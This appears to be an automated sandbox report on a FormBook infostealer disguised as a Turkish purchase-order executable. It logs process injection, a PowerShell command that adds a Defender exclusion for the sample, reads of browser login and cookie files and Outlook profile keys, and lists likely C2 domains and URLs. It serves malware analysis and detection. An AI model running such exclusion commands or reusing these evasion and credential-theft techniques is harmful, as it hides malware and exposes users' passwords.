Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtAllocateVirtualMemory: Direct from: 0x77462BEC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtOpenKeyEx: Direct from: 0x77462B9C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Memory written: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: NULL target: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Section loaded: NULL target: C:\Windows\SysWOW64\unregmp2.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: NULL target: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: NULL target: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\unregmp2.exe

Thread register set: target process: 1148

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\unregmp2.exe

Thread APC queued: target process: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847777206.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000000.1534265328.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000000.1677026696.0000000001170000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847777206.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000000.1534265328.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000000.1677026696.0000000001170000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847777206.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000000.1534265328.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000000.1677026696.0000000001170000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000002.3847777206.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 00000006.00000000.1534265328.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000000.1677026696.0000000001170000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Queries volume information: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\unregmp2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	31%	Virustotal		Browse
Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	21%	ReversingLabs	Win32.Trojan.Generic
Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
mocar.pro	1%	Virustotal	Browse
www.highwavesmarine.com	0%	Virustotal	Browse
www.thesprinklesontop.com	0%	Virustotal	Browse
parkingpage.namecheap.com	0%	Virustotal	Browse
www.ennerdaledevcons.co.uk	1%	Virustotal	Browse
dxgsf.shop	2%	Virustotal	Browse
stefanogaus.com	1%	Virustotal	Browse
www.newzionocala.com	0%	Virustotal	Browse
xiaoyue.zhuangkou.com	0%	Virustotal	Browse
www.fungusbus.com	1%	Virustotal	Browse
www.luo918.com	0%	Virustotal	Browse
www.evertudy.xyz	2%	Virustotal	Browse
www.dennisrosenberg.studio	0%	Virustotal	Browse
56.126.166.20.in-addr.arpa	3%	Virustotal	Browse
www.dxgsf.shop	2%	Virustotal	Browse
www.stefanogaus.com	1%	Virustotal	Browse
www.shoplifestylebrand.com	0%	Virustotal	Browse
www.neworldelectronic.com	1%	Virustotal	Browse
www.mocar.pro	1%	Virustotal	Browse
www.artemhypnotherapy.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Avira URL Cloud	safe
http://www.qe1jqiste.sbs/2dv8/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.evertudy.xyz/csr7/	0%	Avira URL Cloud	safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.fungusbus.com/dmjt/?iJiX_=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnEtY8cBV1InP23K1rvoSk7X1+smLn8qttMRFZOf+8GJ/nwg==&eZ=3HYLM	0%	Avira URL Cloud	safe
http://www.ennerdaledevcons.co.uk/4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfZlnLf1iW05ccEvRvL6OrWq1JPJo5l6rk1ZbisRWcHyTHqg==	0%	Avira URL Cloud	safe
https://www.namecheap.com/domains/registration/results/?domain=fungusbus.com	0%	Avira URL Cloud	safe
http://www.thesprinklesontop.com/sk-logabpstatus.php?a=a1hVY3BFSVExenNSTmVHYmpRNUdGNXVZNnlIbGdzZTQ2N	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://mocar.pro/prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1	0%	Avira URL Cloud	safe
http://www.thesprinklesontop.com/px.js?ch=1	0%	Avira URL Cloud	safe
http://www.thesprinklesontop.com/px.js?ch=2	0%	Avira URL Cloud	safe
http://www.luo918.com/qmv1/?eZ=3HYLM&iJiX_=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7duzMF8qcwSy0or9MU4FAt6yJL5XTwcCyhmcdeorymiKmWQ==	0%	Avira URL Cloud	safe
https://www.ennerdaledevcons.co.uk/4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zE	0%	Avira URL Cloud	safe
http://www.artemhypnotherapy.com/9285/	0%	Avira URL Cloud	safe
http://www.mocar.pro/prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBew+mwyIGh8NWq3ehH5OgTP/98tgqTRgcUpqrv79RN6be7A==	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	0%	Avira URL Cloud	safe
https://www.sedo.com/services/parking.php3	0%	Avira URL Cloud	safe
http://www.luo918.com/qmv1/	0%	Avira URL Cloud	safe
http://www.dxgsf.shop/vfca/?iJiX_=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJyCFsntjSnqpwzP+jY6yNjY7ViduojwQX6Un4yLfzesgT7A==&eZ=3HYLM	0%	Avira URL Cloud	safe
http://www.stefanogaus.com/0rsk/	0%	Avira URL Cloud	safe
http://www.dxgsf.shop/vfca/	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?	0%	Avira URL Cloud	safe
http://www.mocar.pro/prg5/	0%	Avira URL Cloud	safe
http://www.stefanogaus.com	0%	Avira URL Cloud	safe
http://www.qe1jqiste.sbs/2dv8/?iJiX_=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX29b0eHgxHefEnuc0ogV2nM4gi2K3554lDMjGRktsI1JKBOA==&eZ=3HYLM	0%	Avira URL Cloud	safe
http://www.thesprinklesontop.com/n12h/?eZ=3HYLM&iJiX_=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNiQ0n2zDakMpJnzyHioqcCYotdW6+iH3FtmEZOQT5Ykxdbw==	0%	Avira URL Cloud	safe
https://img.sedoparking.com/templates/images/hero_nc.svg	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Avira URL Cloud	safe
http://www.highwavesmarine.com/vpfr/?eZ=3HYLM&iJiX_=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQp0lsgtKVk15wNPoNEOoMMjyN3LU6dxhHI1FgmxIsamdstg==	0%	Avira URL Cloud	safe
http://www.ennerdaledevcons.co.uk/4ksh/	0%	Avira URL Cloud	safe
http://www.fungusbus.com/dmjt/	0%	Avira URL Cloud	safe
